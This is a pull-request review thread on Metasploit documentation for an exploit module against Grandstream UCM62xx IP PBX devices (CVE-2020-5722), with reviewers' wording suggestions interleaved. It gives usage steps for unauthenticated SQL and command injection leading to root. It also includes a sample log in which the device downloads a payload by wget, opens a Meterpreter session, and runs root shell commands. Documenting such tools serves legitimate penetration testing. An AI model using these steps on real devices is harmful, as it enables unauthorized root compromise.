Exploit Module for Grandstream UCM62xx IP PBX (CVE-2020-5722) (#16056)
rapid7/metasploit-framework: documentation/modules/exploit/linux/http/grandstream_ucm62xx_sendemail_rce.md

## Vulnerable Application

### Description

This module exploits unauthenticated SQL and command injection vulnerabilities affecting
the Grandstream UCM62xx IP PBX series of devices. The vulnerabilities allow an

> unauthenticated and remote attacker to execute commands as root. This module affects

Reviewer: ```suggestion
unauthenticated and remote attacker to execute commands as `root`. This module affects
```

> unauthenticated and remote attacker to execute commands as root. This module affects

Reviewer: Do we not have CVE ID's for these vulnerabilities? Also is there any way to explain how these vulnerabilities tie together a bit more? It seems like this description as it stands glosses over a lot of important details in an effort to try make things short, but the result is that I'm really not sure what this module is meant to be exploiting and in what order to get its results from this description.

Author: Let me know if the update doesn't satisfy.

UCM62xx versions before firmware version 1.0.19.20.

### Installation

> The UCM62xx PBX is a physical device and is not known to be succesfully emulated.

Reviewer: ```suggestion
The UCM62xx PBX is a physical device and is not known to have been successfully emulated by any software.
```

Fixed a typo and made a suggestion on improving the English here.

However, if you have a device, affected firmware can be downloaded here:

* https://firmware.grandstream.com/Release_UCM62xx_1.0.18.13.zip

## Verification Steps

> * Acquire an affected device and configure with affected firmware

Reviewer: ```suggestion
* Acquire an affected device and configure it with the affected firmware
```

* Do: `use exploit/linux/http/grandstream_ucm62xx_sendemail_rce`
* Do: `set RHOST <ip>`
* Do: `check`
* Verify the remote target is flagged as vulnerable
* Do: `set LHOST <ip>`
* Do: `set LPORT <port>`
* Do: `exploit`
* You should get a Meterpreter session.

## Targets

### 0

By default, this targets the PBX with the `reverse_netcat_gaping` payload and returns a reverse shell.

### 1

> By default, this target obtains a meterpreter session using `wget`.

Reviewer: Why the `by default` part here? What is the other case that may occur? If there is one, it should be explained here. If not, then we shouldn't be using the `by default` wording here and should just state what it does.

[+] The target appears to be vulnerable. This determination is based on the version string.
[*] Executing Linux Dropper for linux/armle/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/unV0mXd6RPWD
[*] Local IP: http://10.0.0.3:8080/unV0mXd6RPWD
[*] Client 10.0.0.9 (Wget/1.10.1) requested /unV0mXd6RPWD
[*] Sending payload to 10.0.0.9 (Wget/1.10.1)
[*] Sending stage (903400 bytes) to 10.0.0.9
[*] Meterpreter session 1 opened (10.0.0.3:4444 -> 10.0.0.9:51031 ) at 2022-01-15 12:12:28 -0800
[+] Exploit successfully executed.
[*] Command Stager progress - 100.00% done (113/113 bytes)
[*] Server stopped.

meterpreter > shell
Process 4990 created.
Channel 1 created.
whoami
root
uname -a
Linux UCM6202 3.0.35 #1 SMP PREEMPT Thu Jul 5 15:56:51 CST 2018 armv7l GNU/Linux
cat /proc/cpuinfo
Processor	: ARMv7 Processor rev 10 (v7l)
processor	: 0
BogoMIPS	: 1988.29

processor	: 1
BogoMIPS	: 1987.37

Features	: swp half thumb fastmult vfp edsp neon vfpv3 
CPU implementer	: 0x41
CPU architecture: 7
CPU variant	: 0x2
CPU part	: 0xc09
CPU revision	: 10

Hardware	: Freescale i.MX 6Quad/DualLite/Solo based Board
Revision	: 63015
Serial		: 1126b9d4eacb275c
```

> ### Grandstream UCM6202 IP PBX fimrware version 1.0.18.13. Get reverse shell using netcat.

Reviewer 2: This is missing the firmware versions.

Author: Anyone reading this: I requested @smcintyre-r7 leave a comment that I misspelled "firmware". The version is included.
